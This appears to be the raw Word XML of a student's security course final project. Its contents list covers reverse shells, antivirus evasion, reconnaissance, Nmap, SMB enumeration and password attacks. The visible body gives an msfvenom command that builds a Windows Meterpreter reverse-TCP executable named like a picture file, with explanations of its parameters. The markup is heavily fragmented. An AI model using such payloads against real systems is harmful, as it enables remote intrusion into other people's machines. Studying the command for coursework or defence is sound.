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4C8F" w14:textId="59C93F5B" w:rsidR="00BB4B69" w:rsidRPr="005711D1" w:rsidRDefault="00BB4B69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E6F75F" wp14:editId="164B174A">
            <wp:extent cx="4198620" cy="419862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DF5EC" w14:textId="773A0B65" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2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5711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System</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711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Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711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nd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D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Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18907F38" w14:textId="3BDAB2E6" w:rsidR="00BB4B69" w:rsidRPr="005711D1" w:rsidRDefault="00BB4B69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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INFORMATION SYSTEM SECURTY AND DESİGN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7613B0" w14:textId="0F0B61D7" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FINAL PROJECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E778FF7" w14:textId="77777777" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2" w:rsidP="00E30F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B52655" w14:textId="7420EED6" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2" w:rsidP="00E30F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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MERT KAHRAMANTÜRK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DC767A" w14:textId="36BC62A4" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2" w:rsidP="00E30FA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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18030451002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C4E24" w14:textId="77777777" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2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954C76" w14:textId="77777777" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2" w:rsidP="00E30FA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C27C76D" w14:textId="77777777" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2" w:rsidP="00E30FA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996265B" w14:textId="77777777" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2" w:rsidP="00E30FA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ABE2708" w14:textId="77777777" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2" w:rsidP="00E30FA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D8C795D" w14:textId="7BEC3AF7" w:rsidR="00BB4B69" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2" w:rsidP="00E30FA2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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>All</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>belongs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> me.</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:id w:val="-1095164140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AE7726E" w14:textId="6B59873E" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="005711D1" w:rsidP="005711D1">
          <w:pPr>
            <w:pStyle w:val="TBal"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidRPr="005711D1">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
        </w:p>
        <w:p w14:paraId="794406CF" w14:textId="75646B21" w:rsidR="005711D1" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2" w:rsidP="005711D1">
          <w:pPr>
            <w:pStyle w:val="T1"/>
          </w:pPr>
          <w:r w:rsidRPr="005711D1">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="005711D1">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="005711D1">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="41C62D2F" w14:textId="44C27E76" w:rsidR="005711D1" w:rsidRPr="005711D1" w:rsidRDefault="005711D1" w:rsidP="005711D1">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:lang w:eastAsia="tr-TR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc72673308" w:history="1">
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Establishing a connection to the system via local IP address (LHOST)</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc72673308 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AC032D2" w14:textId="20A490A0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09" w:history="1">
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii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1.2</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:rStyle w:val="Kpr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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:iCs/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Against antivirus programs.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09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A9ED1" w14:textId="06834935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10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Connection from remote server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10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BB3C9" w14:textId="5D55F170" w:rsidR="005711D1" w:rsidRPr="005711D1" w:rsidRDefault="005711D1" w:rsidP="005711D1">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:lang w:eastAsia="tr-TR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc72673311" w:history="1">
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>ARMİTAGE</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc72673311 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="340CE329" w14:textId="14D2EF87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12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Process Examples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12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37E20" w14:textId="117F51D9" w:rsidR="005711D1" w:rsidRPr="005711D1" w:rsidRDefault="005711D1" w:rsidP="005711D1">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:lang w:eastAsia="tr-TR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc72673313" w:history="1">
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>There are some precautions we should take to avoid such attacks.</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc72673313 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02BA707D" w14:textId="331E5F32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14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Wireshark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14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A1D63" w14:textId="5AF05127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15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Gather Passive Information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15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63EB9" w14:textId="00F20BE6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16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3 Easy Way To Get Critical Information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16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1354B" w14:textId="209B96E6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17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4 Gathering Personal İnformation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17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66246" w14:textId="564E0E10" w:rsidR="005711D1" w:rsidRPr="005711D1" w:rsidRDefault="005711D1" w:rsidP="005711D1">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:lang w:eastAsia="tr-TR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc72673318" w:history="1">
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Maltego</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc72673318 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B350413" w14:textId="2D7440AA" w:rsidR="005711D1" w:rsidRPr="005711D1" w:rsidRDefault="005711D1" w:rsidP="005711D1">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:lang w:eastAsia="tr-TR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc72673319" w:history="1">
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Active Information Gathering</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc72673319 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BEA356D" w14:textId="085C7A8D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20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NMAP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20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07F58" w14:textId="390FF4F3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21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NMAP NSE SCRİPTS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21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2509F" w14:textId="3923F5A1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22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3 Zenmap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22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BD521" w14:textId="214DF585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23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4 SMB ENUMERATİON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23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FC2602" w14:textId="4CDE810B" w:rsidR="005711D1" w:rsidRPr="005711D1" w:rsidRDefault="005711D1" w:rsidP="005711D1">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:lang w:eastAsia="tr-TR"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005711D1">
            <w:rPr>
              <w:rStyle w:val="Kpr"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:color w:val="auto"/>
              <w:u w:val="none"/>
            </w:rPr>
            <w:t xml:space="preserve">    </w:t>
          </w:r>
          <w:hyperlink w:anchor="_Toc72673324" w:history="1">
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>5.5Enum4linux</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc72673324 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D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4AFE76" w14:textId="79C1BF8F" w:rsidR="005711D1" w:rsidRPr="005711D1" w:rsidRDefault="005711D1" w:rsidP="005711D1">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:lang w:eastAsia="tr-TR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc72673325" w:history="1">
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Password Attack</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc72673325 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D109F47" w14:textId="397D99EF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26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1NCRACK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26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B394B" w14:textId="202F607A" w:rsidR="005711D1" w:rsidRPr="005711D1" w:rsidRDefault="005711D1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tr-TR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc72673327" w:history="1">
            <w:r w:rsidRPr="005711D1">
              <w:rPr>
                <w:rStyle w:val="Kpr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2Xhydra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673327 \h </w:instrTex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5711D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DD8D3" w14:textId="4E3C7E61" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2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11D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C309EFD" w14:textId="49D7CE8D" w:rsidR="00BB4B69" w:rsidRPr="005711D1" w:rsidRDefault="00BB4B69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1BD04F" w14:textId="011365C8" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2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345F87" w14:textId="5441AEE3" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2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DF0E88" w14:textId="663D6FF7" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2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FD3A9C" w14:textId="56BE5161" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2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44E6DB" w14:textId="145939A0" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2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046F57" w14:textId="4B3029A2" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2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C887C" w14:textId="77777777" w:rsidR="005711D1" w:rsidRDefault="005711D1" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc72673308"/>
    </w:p>
    <w:p w14:paraId="4C682311" w14:textId="0F097364" w:rsidR="006A0AEC" w:rsidRPr="005711D1" w:rsidRDefault="006A0AEC" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Establishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>connection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to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the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system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via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local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LHOST)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="19E488B2" w14:textId="77777777" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2" w:rsidP="00E30FA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34886A9B" w14:textId="5EC526A3" w:rsidR="001744C8" w:rsidRPr="005711D1" w:rsidRDefault="006145E7" w:rsidP="00D31427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44C8"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#msfvenom -p Windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001744C8"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eterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001744C8"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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001744C8"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verse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001744C8"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LHOST= LPORT= -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001744C8"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xe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001744C8"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&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001744C8"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/</w:t>
      </w:r>
      <w:proofErr w:type="spell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home</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001744C8"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/</w:t>
      </w:r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ertlogopic.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DCA86F" w14:textId="77777777" w:rsidR="006145E7" w:rsidRPr="005711D1" w:rsidRDefault="006145E7" w:rsidP="00D31427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7D29D495" w14:textId="5202A1CA" w:rsidR="001C4DF5" w:rsidRPr="005711D1" w:rsidRDefault="001744C8" w:rsidP="00D31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-</w:t>
      </w:r>
      <w:proofErr w:type="gram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p</w:t>
      </w:r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r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; :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posi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1DE0C27A" w14:textId="5B6B8EC0" w:rsidR="001744C8" w:rsidRPr="005711D1" w:rsidRDefault="001744C8" w:rsidP="00D31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verse</w:t>
      </w:r>
      <w:proofErr w:type="gram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_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: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ver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inked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74050B8F" w14:textId="7BABC62A" w:rsidR="001744C8" w:rsidRPr="005711D1" w:rsidRDefault="001744C8" w:rsidP="00D31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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;LHOST</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00571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14:paraId="53929EBD" w14:textId="3748B746" w:rsidR="001744C8" w:rsidRPr="005711D1" w:rsidRDefault="001744C8" w:rsidP="00D3142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711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;RHOST</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00571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11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IP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ogg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RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AF0A6A" w14:textId="20E7C495" w:rsidR="001744C8" w:rsidRPr="005711D1" w:rsidRDefault="001744C8" w:rsidP="00D3142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711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;LPORT</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00571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11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Data transfer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ayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
